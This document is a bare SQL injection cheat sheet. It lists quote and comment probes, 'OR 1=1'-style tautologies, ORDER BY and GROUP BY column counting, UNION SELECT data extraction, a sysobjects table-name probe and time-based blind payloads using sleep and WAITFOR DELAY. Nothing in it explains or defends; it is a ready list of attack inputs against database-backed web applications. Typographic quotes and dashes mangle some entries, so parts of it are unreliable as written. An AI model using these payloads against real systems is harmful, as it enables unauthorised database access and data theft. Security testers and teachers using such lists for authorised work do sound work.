SQL INJECTION PAYLOAD

‘
‘’
`
``
,
“
“”
/
//
\
\\
;
‘ or “
— or #
‘ OR ‘1
‘ OR 1 — -
“ OR “” = “
“ OR 1 = 1 — -
‘ OR ‘’ = ‘
‘=’
‘LIKE’
‘=0 — +
OR 1=1
‘ OR ‘x’=’x
‘ AND id IS NULL; —
‘’’’’’’’’’’’’UNION SELECT ‘2
%00
/*…*/
+ addition, concatenate (or space in url)
|| (double pipe) concatenate
% wildcard attribute indicator

@variable local variable
@@variable global variable

# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2

1' ORDER BY 1 — +
1' ORDER BY 2 — +
1' ORDER BY 3 — +

1' ORDER BY 1,2 — +
1' ORDER BY 1,2,3 — +

1' GROUP BY 1,2, — +
1' GROUP BY 1,2,3 — +
‘ GROUP BY columnnames having 1=1 —

-1' UNION SELECT 1,2,3 — +
‘ UNION SELECT sum(columnname ) from tablename —

-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

‘ AND MID(VERSION(),1,1) = ‘5’;

‘ and 1 in (select min(name) from sysobjects where xtype = ‘U’ and name > ‘.’) —

Finding the table name

Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
‘;WAITFOR DELAY ‘0:0:30’ —

Comments:

# Hash comment
/* C-style comment
— — SQL comment
;%00 Nullbyte
` Backtick